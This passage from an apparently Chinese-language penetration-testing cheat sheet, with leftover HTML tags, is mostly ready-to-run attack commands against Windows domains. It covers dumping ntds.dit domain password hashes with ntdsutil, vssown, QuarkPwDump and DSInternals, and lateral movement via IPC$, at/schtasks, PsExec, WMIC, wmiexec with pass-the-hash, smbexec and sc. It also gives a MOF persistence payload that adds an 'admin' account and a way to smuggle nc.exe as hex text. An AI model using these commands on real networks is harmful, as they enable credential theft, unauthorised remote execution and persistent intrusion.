ntdsutil snapshot "mount {GUID}"<\/span> quit quit <\/span><\/span><\/code><\/pre><\/li> 复制文件： copy<\/span> MOUNT_POINT\windows\ntds\ntds.dit c:\ntds.dit <\/span><\/span><\/code><\/pre><\/li> 卸载删除快照： ntdsutil snapshot "unmount {GUID}"<\/span> "delete {GUID}"<\/span> quit quit <\/span><\/span><\/code><\/pre><\/li> <\/ol> QuarkPwDump分析<\/h4> 在线提取： QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit <\/span><\/span><\/code><\/pre><\/li> 离线提取（需system.hiv）： QuarkPwDump.exe --dump-hash-domain --with-history --ntds-file c:\ntds.dit --system-file c:\system.hiv <\/span><\/span><\/code><\/pre><\/li> <\/ul> vssown.vbs + libesedb + NtdsXtract<\/h4> 使用vssown.vbs创建卷影拷贝： cscript vssown.vbs \/start <\/span><\/span>cscript vssown.vbs \/create c <\/span><\/span>cscript vssown.vbs \/list <\/span><\/span>cscript vssown.vbs \/delete {GUID} <\/span><\/span><\/code><\/pre><\/li> 复制出ntds.dit和system文件<\/li> Linux环境下使用libesedb和NtdsXtract分析<\/li> <\/ol> PowerShell(DSInternals)分析<\/h4> 允许执行脚本： Set-ExecutionPolicy Unrestricted <\/span><\/span><\/code><\/pre><\/li> 导入模块： Import-Module .\DSInternals <\/span><\/span><\/code><\/pre><\/li> 分析Hash： $key = Get-BootKey -SystemHivePath 'C:\SYSTEM'<\/span> <\/span><\/span>Get-ADDBAccount -All -DBPath 'C:\ntds.dit'<\/span> -BootKey $key \| Out-File hash.txt <\/span><\/span><\/code><\/pre><\/li> <\/ol> 七、远程连接与执行技术<\/h2> 7.1 at&schtasks<\/h3> 经典流程：建立IPC$连接： net use \\目标IP\ipc$ 密码 \/user:账号 <\/span><\/span><\/code><\/pre><\/li> 复制文件： copy<\/span> batch.bat \\目标IP\admin$\batch.bat <\/span><\/span><\/code><\/pre><\/li> 查看时间： net time \\目标IP <\/span><\/span><\/code><\/pre><\/li> 添加任务： at \\目标IP 时间 \\目标IP\admin$\batch.bat <\/span><\/span><\/code><\/pre>注意：6:21指上午时间，下午需用6.21PM<\/li> 查看任务： at \\目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ol> <\/li> <\/ul> 7.2 PsExec<\/h3> 基本用法： psexec.exe \\目标IP -u 用户名 -p 密码 program.exe <\/span><\/span><\/code><\/pre><\/li> 常用参数： -c<\/code>：拷贝文件到远程机器并运行（运行后自动删除）<\/li> -d<\/code>：不等待程序执行完就返回<\/li> -accepteula<\/code>：绕过首次运行的许可协议<\/li> <\/ul> <\/li> <\/ul> 7.3 WMIC<\/h3> 执行命令： wmic \/node:目标IP \/user:用户名 \/password:密码 process call create "c:\windows\temp\batch.bat"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.4 wmiexec.vbs<\/h3> 半交互模式： cscript.exe \/\/nologo wmiexec.vbs \/shell 目标IP 用户名密码 <\/span><\/span><\/code><\/pre><\/li> 单命令执行： cscript.exe wmiexec.vbs \/cmd 目标IP 用户名密码 "命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> Hash注入： wce -s LMHASH:NTHASH <\/span><\/span>cscript.exe \/\/nologo wmiexec.vbs \/shell 目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.5 smbexec<\/h3> 使用方式： smbexec.exe 目标IP 用户名密码命令共享名 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.6 PowerShell Remoting<\/h3> 示例： Invoke-PowerShellWmi.ps1 -ComputerName 目标<\/span>IP -Username 用户名<\/span> -Password 密码<\/span> -Command "命令"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.7 SC创建服务<\/h3> 系统权限： sc \\目标IP create 服务名 binpath= c:\cmd.exe <\/span><\/span>sc \\目标IP start 服务名 <\/span><\/span>sc \\目标IP delete 服务名 <\/span><\/span><\/code><\/pre><\/li> 指定用户权限： sc \\目标IP create 服务名 binpath= "c:\cmd.exe"<\/span> obj= "域名\用户名"<\/span> password= 密码 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.8 schtasks计划任务<\/h3> 创建任务： schtasks \/create \/tn 任务名 \/tr 执行命令 \/sc once \/st 时间 \/S 目标IP \/RU System <\/span><\/span><\/code><\/pre><\/li> 运行任务： schtasks \/run \/tn 任务名 \/S 目标IP <\/span><\/span><\/code><\/pre><\/li> 删除任务： schtasks \/F \/delete \/tn 任务名 \/S 目标IP <\/span><\/span><\/code><\/pre><\/li> <\/ul> 7.9 SMB+MOF\/DLL劫持<\/h3> MOF文件示例： #pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin Admin123! \/add\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; <\/code><\/pre> <\/li> <\/ul> 7.10 PTH + compmgmt.msc<\/h3> 使用Pass-the-Hash攻击配合计算机管理工具进行远程管理<\/li> <\/ul> 八、实用技巧与工具<\/h2> 8.1 文件编译技术<\/h3> PowerShell转换exe与txt<\/h4> Exe转Text： [byte[]]<\/span> $hexdump = get-content -encoding byte -path "nc.exe"<\/span> <\/span><\/span>[System.IO.File]<\/span>::WriteAllLines("nc.txt"<\/span>, ([string]<\/span>$hexdump)) <\/span><\/span><\/code><\/pre><\/li> Text转Exe： [String]<\/span>$hexdump = get-content -path "nc.txt"<\/span> <\/span><\/span>[Byte[]]<\/span> $temp = $hexdump -split ' '<\/span> <\/span><\/span>[System.IO.File]<\/span>::WriteAllBytes("nc1.exe"<\/span>, $temp) <\/span><\/span><\/code><\/pre><\/li> <\/ul> csc.exe编译C#源码<\/h4> csc.exe \/out:C:\path\output.exe C:\path\source.cs <\/span><\/span><\/code><\/pre>debug程序转换<\/h4> 将exe转换为hex格式<\/li> 通过echo写入文件<\/li> 使用debug还原为exe<\/li> <\/ol> 8.2 内网渗透常用工具<\/h3> EarthWorm<\/strong>：跨平台端口转发与代理<\/li> Tunna<\/strong>：HTTP隧道工具<\/li> reGeorg<\/strong>：基于Web的SOCKS代理<\/li> QuarkPwDump<\/strong>：Hash提取工具<\/li> Mimikatz<\/strong>：凭据提取神器<\/li> Nishang<\/strong>：PowerShell渗透框架<\/li> DSInternals<\/strong>：PowerShell活动目录分析工具<\/li> ProcDump<\/strong>：进程内存转储工具<\/li> vshadow<\/strong>：微软卷影拷贝工具<\/li> libesedb+NtdsXtract<\/strong>：NTDS.DIT分析工具链<\/li> <\/ol> 8.3 实用资源链接<\/h3> EarthWorm工具<\/a><\/li> Tunna工具详解<\/a><\/li> SSH端口转发指南<\/a><\/li> 端口利用大全<\/a><\/li> 各种语言反弹Shell<\/a><\/li> DSInternals使用指南<\/a><\/li> <\/ol>